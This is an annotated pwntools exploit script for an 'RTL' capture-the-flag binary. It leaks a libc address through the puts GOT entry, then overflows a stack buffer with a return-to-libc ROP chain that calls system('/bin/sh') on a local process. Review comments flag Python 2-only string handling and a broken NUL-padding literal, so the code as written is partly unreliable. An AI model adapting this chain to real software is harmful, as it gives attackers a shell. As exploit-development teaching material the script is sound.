RTL

from pwn import *

# Walkthrough of a return-to-libc exploit against the "RTL" challenge binary.
# The script drives the target in two phases: it first leaks a libc address
# through menu option 1, then sends a ROP chain through menu option 2.
# Every offset and gadget address below is hard-coded for one specific
# binary/libc build and will not transfer to another.
#
# NOTE(review): the str/bytes arithmetic below ("A" * 0x10 concatenated with
# p64(...), recv() output concatenated with a str literal) relies on Python 2
# semantics where str and bytes are the same type; under Python 3 those
# concatenations raise TypeError.
context.log_level = 'debug'  # echo every byte sent/received; helps when the leak parsing is off
r = process("./RTL")  # local target process only; no remote() variant on this page
e = ELF("./RTL")  # parsed binary, used solely for its GOT below

# Phase 1: menu option 1 -- presumably a read-from-address primitive, given
# that an address is sent next and a pointer is read back.
r.recvuntil(">")
r.sendline("1")
r.recvuntil(":")

# Ask for the GOT slot of puts; once puts has been resolved it holds puts'
# address inside libc.
puts_got = e.got['puts']
r.sendline(str(puts_got))

# Offsets of puts and system inside the target's libc build (build-specific).
puts_offset = 0x80aa0
sys_offset = 0x4f550
r.recv()  # discard whatever precedes the leaked pointer
# Take the 6 significant bytes of the leaked pointer, pad to 8 for u64, and
# subtract puts' offset to recover libc's load base.
# NOTE(review): "\\x00\\x00" is an escaped 8-character string, not two NUL
# bytes, so u64 receives 14 bytes and should fail -- most likely a rendering
# artifact of the page; the intent is presumably two NUL padding bytes.
libc_base = u64(r.recv(6) + "\\x00\\x00") - puts_offset

print (hex(libc_base))
sys = libc_base + sys_offset  # system() in the leaked libc
binsh = libc_base + 0x1b3e1a  # "/bin/sh" string inside libc (offset also build-specific)
# Gadgets at fixed 0x400xxx addresses: presumably the binary is non-PIE, since
# the chain relies on them being stable across runs. Mitigation note: building
# the target with PIE would invalidate these constants and the direct GOT read.
pop_rdi = 0x0000000000400933  # pop rdi; ret -- loads system()'s first argument
ret = 0x0000000000400297  # lone ret -- presumably for 16-byte stack alignment before system; confirm

# Phase 2: menu option 2 -- presumably reads into a stack buffer without a
# bounds check, since the payload overwrites the saved return address.
r.recvuntil(">")
r.sendline("2")

# Padding to reach the return address (presumably 0x10 bytes of buffer plus
# 8 bytes of saved rbp), followed by the chain: ret -> pop rdi (binsh) -> system.
pay = "A" * 0x10
pay += "A" * 8
pay += p64(ret)
pay += p64(pop_rdi)
pay += p64(binsh)
pay += p64(sys)

r.sendline(pay)

r.interactive()  # hand the resulting session over to the user